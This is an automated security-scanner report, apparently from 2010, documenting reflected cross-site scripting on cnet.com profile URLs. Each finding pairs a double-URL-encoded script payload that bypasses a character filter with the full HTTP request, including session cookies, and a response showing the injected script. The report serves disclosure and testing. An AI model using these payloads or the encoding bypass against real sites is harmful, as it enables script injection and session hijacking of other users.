The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/sharmajuniore1f97%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e19fa04b638d/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:44 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:44 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=966 Connection: Keep-Alive Content-Length: 31105
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="sharmajuniore1f97"><script>alert(1)</script>19fa04b638d"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5512f%253cscript%253ealert%25281%2529%253c%252fscript%253e34187426055 was submitted in the REST URL parameter 2. This input was echoed as 5512f<script>alert(1)</script>34187426055 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/shootfirst5512f%253cscript%253ealert%25281%2529%253c%252fscript%253e34187426055/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:43 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:44 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=977 Connection: Keep-Alive Content-Length: 31092
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>shootfirst5512f<script>alert(1)</script>34187426055's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de616%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea59830e7876 was submitted in the REST URL parameter 2. This input was echoed as de616"><script>alert(1)</script>a59830e7876 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/shootfirstde616%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea59830e7876/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:42 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:42 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=950 Connection: Keep-Alive Content-Length: 31132
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="shootfirstde616"><script>alert(1)</script>a59830e7876"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8676c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e620203038 was submitted in the REST URL parameter 2. This input was echoed as 8676c"><script>alert(1)</script>9e620203038 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/srosenblatt8676c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e620203038/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:10:24 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:10:25 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=993 Connection: Keep-Alive Content-Length: 31077
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="srosenblatt8676c"><script>alert(1)</script>9e620203038"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6f4f5%253cscript%253ealert%25281%2529%253c%252fscript%253ea235b8453f was submitted in the REST URL parameter 2. This input was echoed as 6f4f5<script>alert(1)</script>a235b8453f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/srosenblatt6f4f5%253cscript%253ealert%25281%2529%253c%252fscript%253ea235b8453f/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:10:26 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:10:26 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=988 Connection: Keep-Alive Content-Length: 31107
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>srosenblatt6f4f5<script>alert(1)</script>a235b8453f's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7425a%253cscript%253ealert%25281%2529%253c%252fscript%253eaddcc941c75 was submitted in the REST URL parameter 2. This input was echoed as 7425a<script>alert(1)</script>addcc941c75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/stevenmusil7425a%253cscript%253ealert%25281%2529%253c%252fscript%253eaddcc941c75/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:08:43 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:08:43 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=993 Connection: Keep-Alive Content-Length: 31034
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>stevenmusil7425a<script>alert(1)</script>addcc941c75's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e159e1751bb9 was submitted in the REST URL parameter 2. This input was echoed as 36808"><script>alert(1)</script>159e1751bb9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/stevenmusil36808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e159e1751bb9/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:08:41 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:08:41 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=985 Connection: Keep-Alive Content-Length: 31107
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="stevenmusil36808"><script>alert(1)</script>159e1751bb9"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40263%253cscript%253ealert%25281%2529%253c%252fscript%253e375fbdcdad9 was submitted in the REST URL parameter 2. This input was echoed as 40263<script>alert(1)</script>375fbdcdad9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/wcunning40263%253cscript%253ealert%25281%2529%253c%252fscript%253e375fbdcdad9/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:24 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:25 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=993 Connection: Keep-Alive Content-Length: 31075
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>wcunning40263<script>alert(1)</script>375fbdcdad9's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f458%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ea7c698f10 was submitted in the REST URL parameter 2. This input was echoed as 3f458"><script>alert(1)</script>3ea7c698f10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/wcunning3f458%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ea7c698f10/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:23 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:23 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=983 Connection: Keep-Alive Content-Length: 31127
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="wcunning3f458"><script>alert(1)</script>3ea7c698f10"/> ...[SNIP]...
Report generated by Hoyt LLCr at Tue Nov 16 18:22:15 CST 2010.